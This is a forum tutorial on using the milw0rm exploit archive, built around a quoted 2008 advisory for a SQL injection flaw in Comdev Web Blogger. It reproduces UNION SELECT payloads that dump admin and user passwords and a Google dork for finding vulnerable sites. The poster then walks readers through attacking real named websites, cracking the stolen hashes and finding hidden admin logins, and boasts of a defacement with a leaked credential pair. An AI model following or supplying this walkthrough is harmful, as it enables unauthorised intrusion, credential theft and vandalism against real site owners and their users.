Go4Expert - How to use Milw0rm.com

Hello guys i see people always asking me how to use milw0rm.com so i figured i will show you all.

Today we are going to learn the web applications part of milw0rm.com

So

lets go to Milw0rm shall we

Now go to web applications and you see a whole lot of stuff right were gonna look for sql injection vulnerability.

We found this okay right here

And it shows you the following

Code:

____________________   ___ ___ ________

\_   _____/\_   ___ \ /   |   \\_____  \  

 |    __)_ /    \  \//    ~    \/   |   \ 

 |        \\     \___\    Y    /    |    \

/_______  / \______  /\___|_  /\_______  /

        \/         \/       \/         \/ 



                                        .OR.ID

ECHO_ADV_100$2008



-----------------------------------------------------------------------------------------

[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability

-----------------------------------------------------------------------------------------



Author       : M.Hasran Addahroni

Date         : July, 14 th 2008

Location     : Jakarta, Indonesia

Web          : http://e-rdc.org/v1/news.php?readmore=102

Critical Lvl : Medium

Impact       : System access

Where        : From Remote

---------------------------------------------------------------------------



Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~



Application : Comdev Web Blogger

version     : <= 4.1.3

Vendor      : http://www.comdevweb.com/blogger.php

Description :



Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.

Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit

the Web Blogger to Your Web Design Page â€¢ Multiple user accounts to create & invite friends to their own blogs â€¢ Hot Blogs, 

Latest Blogs â€¢ RSS News Feeds â€¢ Blogs Categorisation â€¢ Hot Blogs & Latest Blogs â€¢ Search Blogs â€¢ Mini Calendar â€¢ Monthly Archiveâ€¢

Links to Friends' Blog â€¢ Public or Friends View Only Blogs â€¢ Set Post Comments Permission â€¢ Friends Login â€¢ Forms Submission with 

CAPTCHA Image Verification â€¢ WYSIWYG Editor for Blog & Comment â€¢ Notify Friends of New Blog â€¢ Set View & Post Comment Permissions â€¢

sSet Date & Time Format â€¢ Local Time Zone â€¢ Pre-defined Front-end CSS â€¢ Personalized Emails & Auto-Responders â€¢ 

Installation Support available



---------------------------------------------------------------------------



Vulnerability:

~~~~~~~~~~~~~



Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used 

in an sql query.

This can be exploited thru the browser to manipulate SQL queries and pull the username and password

from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.





Poc/Exploit:

~~~~~~~~~



http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--

http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*



Admin Login at http://www.example.com/[PATH]/oneadmin/



Dork:

~~~~

Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"





Solution:

~~~~~~



- Edit the source code to ensure that input is properly verified.

- Turn on magic_quotes in php.ini





Timeline:

~~~~~~~~



- 11 - 07 - 2008 bug found

- 11 - 07 - 2008 vendor contacted

- 14 - 07 - 2008 advisory released

---------------------------------------------------------------------------



Shoutz:

~~~~

~ ping - my dearest wife "happy birthday darling", zautha - my beloved son

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,

the_hydra,neng chika, str0ke

~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES

~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,

super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b

~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,

kuntua, stev_manado,nofry,k1tk4t,0pt1c

~ newbie_hacker@yahoogroups.com

~ #aikmel #e-c-h-o @irc.dal.net



---------------------------------------------------------------------------

Contact:

~~~~~



K-159 || echo|staff || eufrato[at]gmail[dot]com

Homepage: http://www.e-rdc.org/



-------------------------------- [ EOF ] ---------------------------------- 



# milw0rm.com [2008-07-15]

now look at

Code:

http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--

http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*

This is the sql injection into the site there are 2 separate ones and under that is the DORK:

Code:

Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth

The dork is what you are going to type in google or whatever search engine you want and the search engine will give you a list of websites that power by that so go into your search engine and paste that or type

Code:

allinurl:".php?domain= arcyear=2007 arcmonth

So you see a whole bunch of websites right and your looking for the dork so the website listed are below

http://www.manilatimes.net.ph/index....007&arcmonth=6

http://www.ravendrumfoundation.org/w...007&arcmonth=9

http://www.shiptalkforum.com/index.p...007&arcmonth=5

And if you remember the dork you was looking for the .php?domain=&arcyear=2007&acrmonth=6

So you got all the sites that google provided so look for any site that has the dork and click it now once you are at that site get the sql injection code and paste it in the url where it says arcmonth=6 paste it after the = remember to delete the 6 tho so it will look like this

http://wealthbeing.co.uk/blog.php?do...m%20sys_user--

We hit enter and u see the admin username and password along with other users as well that password is encrypted so user john the ripper or cain and abel to decrypt it and then you will have to find the admin login page i would 1. go through every link right click view source and look for a admin login page if its not there get the cracked version of acuntix and scan that website and it will show you the admin page then you can just login and do whatever you want below is a site that i did on a demonstration and lets go to the following site

HACKED BY XXxxImmortalxxXX

Now what i did was sql inject the site and it gave me the following

admin::imagert26

Which was the usernamd and password and I dunno why it wasnt encrypted anyways it said look for /oneadmin well oneadmin wasnt there

So then we go through every link looking at the source code looking for a login page didnt find one my last step was to scan the site with all of its links

I did and i got

/cms/index.php?

which was the login i think they tryed to hide it lol

so we then login and do what ever we want hope this tut helps